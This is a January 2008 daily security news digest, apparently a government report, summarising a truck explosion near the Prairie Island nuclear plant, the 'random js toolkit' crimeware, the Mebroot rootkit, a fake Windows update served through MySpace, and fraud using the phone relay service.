Tuesday, January 15, 2008

Daily Report

• The Associated Press reports that a man blew up a dump truck about a mile away from the Prairie Island nuclear plant in Minnesota. The vice president of the plant site said the plant was put on heightened security for over two hours until officials could determine what had happened. The plant returned to normal activity once investigators determined that the blast was not connected to the plant. (See item 5)

• Vnunet.com reports that security experts have warned of a crimeware attack caused by an “extremely elusive” Trojan that sends data from infected machines direct to the malware author. Stolen data can include documents, passwords, surfing habits or any other sensitive information of interest to the criminal. More than 10,000 websites in the US were infected by this malware in December alone. (See item 26)

Information Technology

26. January 14, vnunet.com – (National) Hackers unleash ‘insidious’ crimeware attack. Security experts have warned of a crimeware attack that threatens to turn highly trusted websites into “insidious traps” for unwary visitors. Finjan’s Malicious Code Research Center said that more than 10,000 websites in the US were infected by this malware in December alone. The attack, which the firm has designated ‘random js toolkit,’ is an “extremely elusive” Trojan that sends data from infected machines direct to the malware author. Stolen data can include documents, passwords, surfing habits or any other sensitive information of interest to the criminal. The JavaScript toolkit is created dynamically and changes every time it is accessed. This makes it almost impossible for traditional signature-based anti-malware products to detect. Finjan’s chief technology officer explained that signature-based detection for dynamic script is ineffective. “‘Signaturing’ the exploiting code itself is not effective, since these exploits change continually to stay ahead of current zero-day threats and available patches,” he said. “Keeping an up-to-date list of ‘highly-trusted/doubtful’ domains serves only as a limited defense against this attack vector.” He added that the ‘random js toolkit’ is an example of the recent trend among cyber-criminals to undermine ‘trusted’ websites. “Studies in mid-2007 showed nearly 30,000 infected web pages being created every day,” he said. “About 80 per cent of pages hosting malicious software or containing drive-by downloads with damaging content were located on hacked legitimate sites. Today the situation is much worse.”

27. January 13, IDG News Service – (National) New Rootkit uses old trick to hide. A new type of malicious software has emerged, using a decades-old technique to hide itself from antivirus software. The malware, called Trojan.Mebroot by Symantec, installs itself on the first part of the computer’s hard drive to be read on startup, then makes changes to the Windows kernel, making it hard for security software to detect it. Criminals have been installing Trojan.Mebroot, known as a master boot record rootkit, since mid-December, and were able to infect nearly 5,000 users in two separate attacks. Once installed, the malware gives attackers control over the victim’s machine. The criminals are using several different versions of this attack code, some of which are not currently being detected by some antivirus products.


28. January 12, IDG News Service – (National) Hacked MySpace page serves up fake Windows update. There is now one more reason to be security-conscious while using MySpace.com: fake Microsoft updates. Using a hacked MySpace profile, online criminals are trying to trick victims into downloading a malicious Trojan Horse program by disguising it as a Microsoft update, according to researchers at security vendor McAfee. The attack is certainly not widespread -- McAfee has seen it used on only one MySpace profile -- but it does show how sites like MySpace can be abused by criminals. Web surfers are presented with what appears to be a popup window advising them to download the latest version of Microsoft’s Windows Malicious Software Removal Tool, which was just released this Tuesday. This software is distributed by Microsoft to help Windows users rid their systems of malware. In reality, the popup window is just part of a larger image that takes up most of the computer screen. If the user clicks anywhere on this image, his computer will then begin to download the Trojan program. The Trojan, known as TFactory, is a well-known piece of code that has been used by criminals for well over a year, according to a security research manager with McAfee. Hackers were able to launch this attack because they either discovered a flaw in the MySpace code or found a way of taking over user accounts, he said. “Our best guess is [the owner of the one MySpace profile] just got their password and user name phished,” he said. Social networking sites allow their members to use an array of powerful Web programming tools that are increasingly coming under the scrutiny of hackers looking for ways to misuse them. In November, hackers found a way to serve up Web-based attack code from the MySpace profiles of a number of popular musical artists.


Communications Sector

29. January 13, Baltimore Sun – (National) FCC warns of fraud via phone relay service. The Federal Communications Commission is warning businesses that people posing as hearing-impaired consumers have been misusing the Internet-based telecommunications relay service (TRS) to commit fraudulent business transactions. The Americans with Disabilities Act of 1990 and FCC regulations require that calls made using TRS be “functionally equivalent” to telephone calls. Reaching a specially trained communications assistant on TRS and instructing them to make a call is, in effect, the same as receiving a dial tone. Anyone can use TRS, and unfortunately, the FCC says, people without disabilities who are posing as hearing-impaired are using TRS and stolen or fake credit cards to scam businesses. While the ADA prohibits businesses from rejecting calls made using TRS, businesses can take steps to protect themselves against fraud. The FCC is working with the Department of Justice, FBI and Federal Trade Commission to stop fraudulent transactions made by phone or over the Internet. To better protect yourself, the FCC urges merchants accepting orders by telephone for goods or services to take steps to ensure that any order placed by phone is valid and the purchaser is authorized to use a particular credit card. Merchants should also beware of callers who are happy to order “whatever you have in stock; supply multiple credit cards as one or more are declined; can’t provide the credit card verification code number (the three-digit number on the back of the card); want goods shipped through a third party and/or to an overseas location; and change delivery or payment method after the order has been approved.” If you believe you have been a victim of fraud or attempted fraud, report it to the FTC at www.ftc.gov or 888-FTC HELP.